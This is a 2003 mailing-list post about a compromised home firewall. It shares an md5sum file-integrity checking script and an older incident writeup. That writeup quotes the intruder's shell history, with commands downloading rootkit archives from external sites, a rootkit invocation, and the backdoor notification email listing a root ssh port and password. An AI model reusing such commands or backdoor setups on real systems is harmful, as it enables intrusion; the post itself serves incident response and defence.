System cracked, notes from similar incident a year ago

steve at horne.homelinux.net steve at horne.homelinux.net
Sun May 25 18:04:40 EDT 2003


                        BLU group members --

(This is sort of a long note but it may be of interest, & I don't post often...)

I was hacked about a year ago.

I wrote up the following shortly after the incident occurred.
Given the current discussion I thought it might be worth posting.
I'm still not sure how  the initial breach occurred but suspect it was a
poor password.  I still have the hackers .bash_history and (somewhere)
a disk image of the hacked system.

Since then (besides closing all unused ports, turning off telnet & other insecure services, ...)
I made a list of critical files in /etc, /sbin, ... and run md5sum  against them regularly
looking for changes.  This isn;t automated, but easily could be.

Just for completeness, here are the commands --

To make the initial list;

===

#!/bin/sh
find /sbin              -type f  -exec md5sum {} \; >  md5list1.txt
find /bin               -type f  -exec md5sum {} \; >> md5list1.txt
find /etc               -type f  -exec md5sum {} \; >> md5list1.txt
find /usr/sbin          -type f  -exec md5sum {} \; >> md5list1.txt
find /usr/bin           -type f  -exec md5sum {} \; >> md5list1.txt
find /usr/local/bin     -type f  -exec md5sum {} \; >> md5list1.txt
find /usr/lib -maxdepth 1   -type f  -exec md5sum {} \; >> md5list1.txt


=========

Then to test,

md5sum --check  md5list1.txt | grep -i failed > diff.txt

I've tried tripwire but found the above much easier to do & understand.
One detection over the past year -- my daughter (who as worked as a linux sysadmin)
added her boyfriend as a user.  That tripped the passwd and shadow files.

======================  Initial note, written up a year ago but never mailed ===========

My firewall was hacked last week.  I took it offline as soon as I suspected --
(Re-configured spare, locked it up, and hopefully secure now - )
I thought the group might be interested in a quick summary.

Bottom line -- the firewall was compromised (burned to a crisp)
but the fire seems to have stopped there.

The computer was running RH 5.1, with updated kernel 2.0.34
I'm still not sure what the exploit was. (Wasn't ftpd or imapd. Maybe lpr?)


I think the hacker may have been logged on when I broke the connection --
certainly he left a bunch of clues -- his .bash_history
lists several "interesting" sites and packages -- rootkit, etc
Quick summary  of sites and packages -- (extracted
from his .bash_history)

lynx rollcage.net/x3.tar.gz
lynx rollcage.net/diverse/essh.tgz
lynx rollcage.net/diverse/dick.tgz
lynx rollcage.net/diverse/ftp.tar.gz
lynx rollcage.net/diverse/bec.tgz
lynx www.hanks.host.sk/srk.tgz
lynx www.sinrk.host.sk/srk.tgz

This last is a rootkit which when invoked like so
./srk rexnet 55789 1971

sent an email thus:
======
To: decoder at email.ro  (note, Mon May 26 09:22:44 EDT 2003 the ip is no longer valid )
Subject: SRK

  ssh 24.128.27.182 -l root -p 55789 # horne.blat.net password: rexnet psyBNC: 1971
======

This email didn't make it out of my system, came to me as root on my main computer.
I was at work but usually have a window open to home machine.
Looked wierd; did a couple of quick checks, then called home,
had my daughter pull the network cables.

========  (End old writeup)

                                                                Steve



More information about the Discuss mailing list